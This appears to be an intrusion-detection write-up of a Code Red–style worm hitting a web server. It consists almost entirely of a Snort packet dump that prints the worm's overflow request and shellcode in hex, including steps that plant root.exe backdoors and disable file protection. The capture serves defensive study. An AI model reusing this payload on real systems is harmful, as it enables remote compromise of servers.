Analysis performed by Wes Bateman of the Manisec Corporation (http://www.manisec.com)

Detect 1: Just Another Code Red Scan

#####
13:11:48.353253 < 65.42.76.163.1508 > victim.network.11.www: S 1441446284:1441446284(0) win 16384 (DF)
13:11:48.353489 < victim.network.11.www > 65.42.76.163.1508: S 1202270519:1202270519(0) ack 1441446285 win 32120 (DF)
13:11:48.387758 < 65.42.76.163.1508 > victim.network.11.www: . 1:1(0) ack 1 win 17520 (DF)
13:11:48.406750 < 65.42.76.163.1508 > victim.network.11.www: . 1:1461(1460) ack 1 win 17520 (DF)
13:11:48.406886 < victim.network.11.www > 65.42.76.163.1508: . 1:1(0) ack 1461 win 30660 (DF)
13:11:48.414877 < 65.42.76.163.1508 > victim.network.11.www: . 1461:2921(1460) ack 1 win 17520 (DF)
13:11:48.422354 < victim.network.11.www > 65.42.76.163.1508: . 1:1(0) ack 2921 win 32120 (DF)
13:11:48.467159 < 65.42.76.163.1508 > victim.network.11.www: P 2921:3819(898) ack 1 win 17520 (DF)
13:11:48.467892 < victim.network.11.www > 65.42.76.163.1508: P 1:359(358) ack 3819 win 32120 (DF)
13:11:48.507577 < 65.42.76.163.1508 > victim.network.11.www: R 1441450103:1441450103(0) win 0 (DF)
#####

--== Initializing Snort ==--
TCPDUMP file reading mode.
Reading network traffic from "65.42.76.163" file.
snaplen = 1544

--== Initialization Complete ==--

09/06-13:11:48.353253 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3E
65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53679 IpLen:20 DgmLen:48 DF
******S* Seq: 0x55EAB98C  Ack: 0x0  Win: 0x4000  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/06-13:11:48.353489 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x3E
victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1697 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0x47A93137  Ack: 0x55EAB98D  Win: 0x7D78  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/06-13:11:48.387758 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3C
65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53684 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x55EAB98D  Ack: 0x47A93138  Win: 0x4470  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/06-13:11:48.406750 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x5EA
65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53685 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x55EAB98D  Ack: 0x47A93138  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 
81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 
00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 
89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.406886 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x3C victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1698 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x47A93138 Ack: 0x55EABF41 Win: 0x77C4 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.414877 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x5EA 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53686 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x55EABF41 Ack: 0x47A93138 Win: 0x4470 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.422354 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x3C victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1699 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x47A93138 Ack: 0x55EAC4F5 Win: 0x7D78 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.467159 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3B8 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53709 IpLen:20 DgmLen:938 DF ***AP*** Seq: 0x55EAC4F5 Ack: 0x47A93138 Win: 0x4470 TcpLen: 20 D0 24 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A .$@..5.$@.h. @.j 01 6A 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 .j.U.5.$@....... FF 25 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 .%`0@..%d0@..%h0 40 00 FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 @..%p0@..%t0@..% 78 30 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC x0@..%|0@....... FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 
00 00 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 .........\EXPLOR 45 52 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 ER.EXE...SOFTWAR 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 E\Microsoft\Wind 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 ows NT\CurrentVe 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 rsion\Winlogon.. 00 53 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF .SFCDisable..... FF 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 .SYSTEM\CurrentC 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 ontrolSet\Servic 65 73 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 es\W3SVC\Paramet 65 72 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 ers\Virtual Root 73 00 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 s..../Scripts... 00 2F 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 ./MSADC../C../D. 00 63 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C .c:\,,217....d:\ 2C 2C 32 31 37 FC FC FC FC FC FC FC FC FC FC FC ,,217........... FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 ..<0...........0 00 00 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 ..`0..L0........ 00 00 91 30 00 00 70 30 00 00 00 00 00 00 00 00 ...0..p0........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 ...............0 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0.... 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 ...0...0...0.... 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 ...0...0...0...0 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 ......KERNEL32.d 6C 6C 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 ll.ADVAPI32.dll. 00 00 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E ..Sleep...GetWin 64 6F 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 dowsDirectoryA.. 00 00 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 ..WinExec...RegQ 75 65 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 ueryValueExA.... 
52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... Snort received signal 3, exiting FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.467892 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x19C victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1700 IpLen:20 DgmLen:398 DF ***AP*** Seq: 0x47A93138 Ack: 0x55EAC877 Win: 0x7D78 TcpLen: 20 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E 6F 74 HTTP/1.1 404 Not 20 46 6F 75 6E 64 0D 0A 44 61 74 65 3A 20 54 68 Found..Date: Th 75 2C 20 30 36 20 53 65 70 20 32 30 30 31 20 31 u, 06 Sep 2001 1 38 3A 31 31 3A 34 31 20 47 4D 54 0D 0A 53 65 72 8:11:41 GMT..Ser 76 65 72 3A 20 41 70 61 63 68 65 2F 31 2E 33 2E ver: Apache/1.3. 
36 20 28 55 6E 69 78 29 20 20 28 52 65 64 20 48  6 (Unix)  (Red H
61 74 2F 4C 69 6E 75 78 29 0D 0A 43 6F 6E 6E 65  at/Linux)..Conne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F  ction: close..Co
6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74  ntent-Type: text
2F 68 74 6D 6C 0D 0A 0D 0A 3C 21 44 4F 43 54 59  /html....<!DOCTY
34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C 2F 54  404 Not Found</T
49 54 4C 45 3E 0A 3C 2F 48 45 41 44 3E 3C 42 4F  ITLE>.</HEAD><BO
44 59 3E 0A 3C 48 31 3E 4E 6F 74 20 46 6F 75 6E  DY>.<H1>Not Foun
64 3C 2F 48 31 3E 0A 54 68 65 20 72 65 71 75 65  d</H1>.The reque
73 74 65 64 20 55 52 4C 20 2F 64 65 66 61 75 6C  sted URL /defaul
74 2E 69 64 61 20 77 61 73 20 6E 6F 74 20 66 6F  t.ida was not fo
75 6E 64 20 6F 6E 20 74 68 69 73 20 73 65 72 76  und on this serv
65 72 2E 3C 50 3E 0A 3C 2F 42 4F 44 59 3E 3C 2F  er.<P>.</BODY></
48 54 4D 4C 3E 0A                                HTML>.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/06-13:11:48.507577 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3C
65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53715 IpLen:20 DgmLen:40 DF
